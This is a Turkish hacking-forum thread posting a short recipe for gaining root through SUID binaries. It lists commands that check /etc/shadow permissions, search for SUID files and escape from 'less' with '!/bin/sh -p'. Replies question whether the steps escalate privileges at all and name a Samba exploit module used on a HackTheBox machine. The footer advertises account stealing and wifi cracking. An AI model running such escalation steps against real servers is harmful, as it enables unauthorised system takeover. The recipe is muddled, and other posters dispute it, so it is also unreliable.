Güvenli Ticaret

Hacktivizm içerisinde gerçekleştirmeyi düşündüğünüz tüm ticaretlerde, dikkat ve önlem sahibi olun.

Daha Fazlası

Sorunum Var

Forum içerisinde yaşadığınız tüm sorunlar için sohbet alanını ya da sayfanın altında belirtilen Telegram kanalımızı kullanın.

Daha Fazlası

Doğru Türkçe ve Kurallar

Türkçemizi her bakımdan doğru kullanın ve forum kurallarına uygun paylaşımlar yapmaya özen gösterin.

Daha Fazlası

How To Abuse SUID To Get Root

HaCkEr_33

Kayıtlı Üye
Katılım
21 Aralık 2020
Mesajlar
69
Tepkime puanı
45
İlgi Alanlarınız
Web Hacking
Cinsiyet
  1. Erkek
  1. ls -la $(which passwd)
  2. ls -la /etc/shadow
  3. find / -perm -4000 2>/dev/null

  4. touch subscribe

  5. less subscribe

  6. boş çıkacak yere !/bin/sh -p yazıyoruz ve artık sunucuda rootuz
 

Can

La Turquie Kémaliste
Admin
Katılım
19 Aralık 2020
Mesajlar
2,055
Tepkime puanı
7,159
Konum
Türkiye
İlgi Alanlarınız
ham radio
Cinsiyet
  1. Erkek
eline sağlık kardeşim
 
R

RootAyyıldız

merhaba sevgili dostum Hacker_33 nasılsın iyimisin hayırlı forumlar dilemek isterim öncelikle komutları teker teker açıklayalım
  • ls -la $(which passwd) (bulundugun dizindeki hereyi görürsün gördügün hereyin yazma okuma gibi izinlerinide görürüsn)​
  • ls -la /etc/shadow (diyerek /etc/shadow shadow dosyasının izinlerini görürüsün)​
  • find / -perm -4000 2>/dev/null (find komutu bulma komutudur burada sen aygıt dizindeki stream dosyasında belirtigin permisonda arama yapıyorsun )​
  • touch subscribe (touch ile dosya oluşturulur)​
  • less subscribe (less ile okuma işlemi yaparsın )​
  • Burada Yaptıgın İşlemler ile bir sunucuda root yetkisi alamaman lazım zira bir kullanıcının yetkisini yükseltecek her hangi bir kelime görmedim​
 

Can

La Turquie Kémaliste
Admin
Katılım
19 Aralık 2020
Mesajlar
2,055
Tepkime puanı
7,159
Konum
Türkiye
İlgi Alanlarınız
ham radio
Cinsiyet
  1. Erkek
merhaba sevgili dostum Hacker_33 nasılsın iyimisin hayırlı forumlar dilemek isterim öncelikle komutları teker teker açıklayalım
  • ls -la $(which passwd) (bulundugun dizindeki hereyi görürsün gördügün hereyin yazma okuma gibi izinlerinide görürüsn)​
  • ls -la /etc/shadow (diyerek /etc/shadow shadow dosyasının izinlerini görürüsün)​
  • find / -perm -4000 2>/dev/null (find komutu bulma komutudur burada sen aygıt dizindeki stream dosyasında belirtigin permisonda arama yapıyorsun )​
  • touch subscribe (touch ile dosya oluşturulur)​
  • less subscribe (less ile okuma işlemi yaparsın )​
  • Burada Yaptıgın İşlemler ile bir sunucuda root yetkisi alamaman lazım zira bir kullanıcının yetkisini yükseltecek her hangi bir kelime görmedim​
  1. ls -la $(which passwd)
  2. ls -la /etc/shadow
  3. find / -perm -4000 2>/dev/null

  4. touch subscribe

  5. less subscribe

  6. boş çıkacak yere !/bin/sh -p yazıyoruz ve artık sunucuda rootuz
ikinizinde ellerine sağlık
 

HaCkEr_33

Kayıtlı Üye
Katılım
21 Aralık 2020
Mesajlar
69
Tepkime puanı
45
İlgi Alanlarınız
Web Hacking
Cinsiyet
  1. Erkek
merhaba sevgili dostum Hacker_33 nasılsın iyimisin hayırlı forumlar dilemek isterim öncelikle komutları teker teker açıklayalım
  • ls -la $(which passwd) (bulundugun dizindeki hereyi görürsün gördügün hereyin yazma okuma gibi izinlerinide görürüsn)​
  • ls -la /etc/shadow (diyerek /etc/shadow shadow dosyasının izinlerini görürüsün)​
  • find / -perm -4000 2>/dev/null (find komutu bulma komutudur burada sen aygıt dizindeki stream dosyasında belirtigin permisonda arama yapıyorsun )​
  • touch subscribe (touch ile dosya oluşturulur)​
  • less subscribe (less ile okuma işlemi yaparsın )​
  • Burada Yaptıgın İşlemler ile bir sunucuda root yetkisi alamaman lazım zira bir kullanıcının yetkisini yükseltecek her hangi bir kelime görmedim​
Anladim root Ayyildiz kanka ama ben bu metodu ctf cozerken bir makinaya sizarken araştırdigimda yapmiştim sunucuda root olmuştum oyüzden not aldıgım için paylaşayım dedim
 
  • Beğen
Tepkiler: Can

HaCkEr_33

Kayıtlı Üye
Katılım
21 Aralık 2020
Mesajlar
69
Tepkime puanı
45
İlgi Alanlarınız
Web Hacking
Cinsiyet
  1. Erkek
merhaba sevgili dostum Hacker_33 nasılsın iyimisin hayırlı forumlar dilemek isterim öncelikle komutları teker teker açıklayalım
  • ls -la $(which passwd) (bulundugun dizindeki hereyi görürsün gördügün hereyin yazma okuma gibi izinlerinide görürüsn)​
  • ls -la /etc/shadow (diyerek /etc/shadow shadow dosyasının izinlerini görürüsün)​
  • find / -perm -4000 2>/dev/null (find komutu bulma komutudur burada sen aygıt dizindeki stream dosyasında belirtigin permisonda arama yapıyorsun )​
  • touch subscribe (touch ile dosya oluşturulur)​
  • less subscribe (less ile okuma işlemi yaparsın )​
  • Burada Yaptıgın İşlemler ile bir sunucuda root yetkisi alamaman lazım zira bir kullanıcının yetkisini yükseltecek her hangi bir kelime görmedim​
Bunlari komutlarin anlamini izledigim videoda adam anlatiyodu ordan biliyorum , ama tam olarak mantigini anlamamıştım doğruyu söylemek gerekirse . HackTheBoxda Lame makinasini cozdugumde bu komutlari kullandim.
 
R

RootAyyıldız

Bunlari komutlarin anlamini izledigim videoda adam anlatiyodu ordan biliyorum , ama tam olarak mantigini anlamamıştım doğruyu söylemek gerekirse . HackTheBoxda Lame makinasini cozdugumde bu komutlari kullandim.
merhaba sevgili dostum makineyi az önce inceleme firsatı buldum makinen rootlanma yetki yükseltme gibi bi durumu yok sadece samba servisinde bulunan bir zafiyet ile makineye giriyorsun multi/samba/usermap_script exploitini kullanarak zaten makineye girdiginde id verdiginde root olarak giriyorsun her hangi bir yetki yükseltme durumu göremedim galiba yalnış bir makine ismi söyledin
 

HaCkEr_33

Kayıtlı Üye
Katılım
21 Aralık 2020
Mesajlar
69
Tepkime puanı
45
İlgi Alanlarınız
Web Hacking
Cinsiyet
  1. Erkek
merhaba sevgili dostum makineyi az önce inceleme firsatı buldum makinen rootlanma yetki yükseltme gibi bi durumu yok sadece samba servisinde bulunan bir zafiyet ile makineye giriyorsun multi/samba/usermap_script exploitini kullanarak zaten makineye girdiginde id verdiginde root olarak giriyorsun her hangi bir yetki yükseltme durumu göremedim galiba yalnış bir makine ismi söyledin
id degerini verdigimde yada whoami komutunu verdigimde beni root kullanicisinda karşılamadı bende internette biraz araştırdım root metodunu birkaçını denedim olmadı , en sonda bu videoyu bulup yaptım root yetkisine yükseldim makina değişmişde ola bilir içeriği birazdan yeniden bakarım ben ona
 
R

RootAyyıldız

id degerini verdigimde yada whoami komutunu verdigimde beni root kullanicisinda karşılamadı bende internette biraz araştırdım root metodunu birkaçını denedim olmadı , en sonda bu videoyu bulup yaptım root yetkisine yükseldim makina değişmişde ola bilir içeriği birazdan yeniden bakarım ben ona
izlediğin video yu atabilirmisin
 

Konuyu görüntüleyen kullanıcılar:

Hukuksal Sorunlar İçin[email protected]
For Legal Problems[email protected]
Hacktivizm.Org
Hacktivizm.Org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Hacktivizm.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Hacktivizm saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Hacktivizm üyelerinin yaptığı bireysel hack faaliyetlerinden Hacktivizm sorumlu değildir. Sitelerinize Hacktivizm ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz. Sitemizde yer alan içerikler hakkındaki şikayetlerinizi Buradan iletişime geçerek bildirebilirsiniz. Please Report Abuse, DMCA, Scamming, Harassment, Crack or any Illegal Activities to [email protected]
Hack Forum
Hacktivizm, 2020 yılında kurulmuş bir siber güvenlik forum sitesidir aynı zamanda hack forumu,hack sitesi,hack forum ve Türk hack forumudur. Hack forum aramalarında ilk sayfada olan bu hack forum sitesi gün geçtikçe gelişmektedir. Hack Forum kelimesinin anlamı ise, hacker kültürü ve bilgisayar güvenliği ile ilgili tartışmalara adanmış bir İnternet forumudur. Web sitesi, analiz şirketi Alexa Internet tarafından web trafiği açısından "Hacking" kategorisinde bir numaralı web sitesi olarak yer almaktadır.

Telefon Takip - İphone Hackleme - PDF Şifre Kırma - Telefon Hackleme - İnstagram Hesap Çalma - Twitter Hesap Çalma - Facebook Hesap Çalma - Wifi Şifre Kırma - Telefon Şifresi Kırma

Hacktivizm Twitter Hacktivizm Youtube Hacktivizm İnstagram Hacktivizm Telegram

Üst